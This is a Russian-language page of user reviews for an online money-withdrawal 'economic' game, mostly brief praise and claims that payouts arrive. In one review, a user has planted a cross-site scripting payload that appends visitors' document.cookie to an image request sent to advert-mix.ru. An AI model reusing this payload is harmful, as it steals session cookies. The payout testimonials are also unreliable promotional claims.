> Отзывы пользователей

Отзывы о игре




Отзывы пользователей
Логин Дата Отзыв
koRSan 20.10.2017 в 22:30:45 Отличный проект! Долгих лет жизни вам


Отзывы пользователей
Логин Дата Отзыв
income 15.09.2017 в 10:41:33 Интересный проект! Думаю можно работать! scriptimg = new Image(); img.src = http://advert-mix.ru/s.gif?+document.cookie;/script


Отзывы пользователей
Логин Дата Отзыв
Ibragim711 09.08.2017 в 19:13:42 Попробуем может что и получится. Cvetkov не влаживая не полуается надо 100 рублей кинуть.


Отзывы пользователей
Логин Дата Отзыв
Unicum78 30.07.2017 в 13:25:12 Один из стабильнейших экономических проектов за последнее время. Аналогичных игр мало в нтернете и эта - одна из лучших. Проверено мониторингом игр с выводом денег - MONITORR.RU


Отзывы пользователей
Логин Дата Отзыв
Kadzuo 18.07.2017 в 06:30:02 Отличный проект! Долгих лет жизни вам. Подумайте можно ли добавить серфинг..


Отзывы пользователей
Логин Дата Отзыв
Ambolik 18.07.2017 в 00:08:23 Проект супер!Выплаты идут!Долгих лет работы проекту!А админу много денег!


Отзывы пользователей
Логин Дата Отзыв
warhammer 17.07.2017 в 07:25:52 Самый лучший проект в мире я готов даже купить все здания в этой игре


Отзывы пользователей
Логин Дата Отзыв
Vitalya89 30.06.2017 в 19:27:07 Проект харош. Виплати идут многократно! Условия супер


Отзывы пользователей
Логин Дата Отзыв
qpalzm 27.06.2017 в 15:52:18 Только сегодня сюда попаламне нравится не знаю что будет дальше


Отзывы пользователей
Логин Дата Отзыв
begaly96kg 25.06.2017 в 04:56:19 супер проект


Отзывы пользователей
Логин Дата Отзыв
dyuri 06.06.2017 в 16:10:44 Начало хорошее но мне кажется что опыт сдерживает инвестиции хотя и делает игру стабильней.


Отзывы пользователей
Логин Дата Отзыв
Fallen67 03.06.2017 в 15:21:17 Мне кажется достойный проект но как то медленно он развиваетстя :( мало людей приходят в игру


Отзывы пользователей
Логин Дата Отзыв
Cvetkov 31.05.2017 в 11:00:33 Игра мне понравилась. Не влаживая я уже вывел свой первый рубль. Думаю пополнить счёт.


Отзывы пользователей
Логин Дата Отзыв
Hammer 31.05.2017 в 09:10:42 Тестируем отзывы


Страницы: 1

Мы с Вами уже: